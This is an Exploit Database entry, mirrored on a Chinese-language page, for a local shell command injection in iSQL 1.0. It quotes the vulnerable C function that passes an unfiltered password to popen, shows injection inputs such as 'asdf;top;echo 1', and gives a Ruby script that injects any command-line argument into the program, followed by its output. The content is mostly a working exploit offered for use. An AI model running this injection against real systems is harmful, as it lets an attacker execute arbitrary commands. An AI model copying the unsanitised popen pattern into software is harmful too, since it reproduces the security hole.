iSQL 1.0 – Command Injection

• Exploit Database
• 16 阅读

• 作者： HaHwul
  日期： 2016-06-13
• 类别：

  • local
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/39938/

• #!/bin/ruby
  # Exploit Title: iSQL(RL) 1.0 - Shell Command Injection
  # Date: 2016-06-13
  # Exploit Author: HaHwul
  # Exploit Author Blog: www.hahwul.com
  # Vendor Homepage: https://github.com/roselone/iSQL
  # Software Link: https://github.com/roselone/iSQL/archive/master.zip
  # Version: 1.0
  # Tested on: Debian [wheezy]
  # CVE : none
  
  
  =begin
  ### Vulnerability Point
   :: [isql_main.c 455 line] popen(cmd,"r"); code is vulnerable
   :: don't filtering special characters in str value
  446 char *get_MD5(char *str){
  447 FILE *stream;
  448 char *buf=malloc(sizeof(char)*33);
  449 char cmd[100];
  450 memset(buf,'\0',sizeof(buf));
  451 memset(cmd,'\0',sizeof(cmd));
  452 strcpy(cmd,"echo "); //5
  453 strcpy((char *)cmd+5,str);
  454 strcpy((char *)cmd+5+strlen(str)," | md5sum");
  455 stream=popen(cmd,"r");
  456 fread(buf,sizeof(char),32,stream);
  457 //printf("%s\n",buf);
  458 return buf;
  459 }
  
  ### Vulnerability Triger
  614while (USER_NUM==-1){
  615 printf(">username:");
  616 scanf("%s",username);
  617 printf(">password:");
  618 scanf("%s",passwd);
  619 md5=get_MD5(passwd);
  
  ### Vulnerability Run
  >username:asdf; 
  >password:asdf;top;echo 1
  
   (~) #> ps -aux | grep top
  root 132790.00.0 4472 860 pts/1S+ 13:33 0:00 sh -c echo asdf;top;echo | md5sum
  root 132800.30.0263043200 pts/1S+ 13:33 0:00 top
  
  =end 
  
  ### Attack command
  #> (sleep 5; echo -en 'aasdf\n';sleep 1;echo -en 'asdf;nc;echo 1';sleep 10) | ./isql
  
  ### Ruby Code
  puts "SQL 1.0 - Shell Command Injection"
  puts "by hahwul"
  if(ARGV.size != 1)
  puts "Usage: ruby iSQL_command_injection.rb [COMMAND]"
  puts " need ./isql in same directory"
  exit()
  else 
  puts "CMD :: "+ARGV[0]
  puts "Run Injection.."
  system("(sleep 5; echo -en 'aasdf\n';sleep 1;echo -en 'asdf;#{ARGV[0]};echo 1';sleep 10) | ./isql")
  end
  
  ### Sample Output
  =begin
  #> ruby test.rb nc
  # Exploit Title: iSQL 1.0 Shell Command Injection
  by hahwul
  CMD :: nc
  Run Injection..
  
  *************** welcome to ISQL ****************
  * version 1.0*
  * Designed by RL *
  * Copyright (c) 2011, RL. All rights reserved*
  ************************************************
  
  >username:>password:verify failure , try again !
  This is nc from the netcat-openbsd package. An alternative nc is available
  in the netcat-traditional package.
  usage: nc [-46bCDdhjklnrStUuvZz] [-I length] [-i interval] [-O length]
  	[-P proxy_username] [-p source_port] [-q seconds] [-s source]
  	[-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol]
  	[-x proxy_address[:port]] [destination] [port]
  >username:>password:verify failure , try again !
  ^Ctest.rb:10:in `system': Interrupt
  	from test.rb:10:in `<main>'
  =end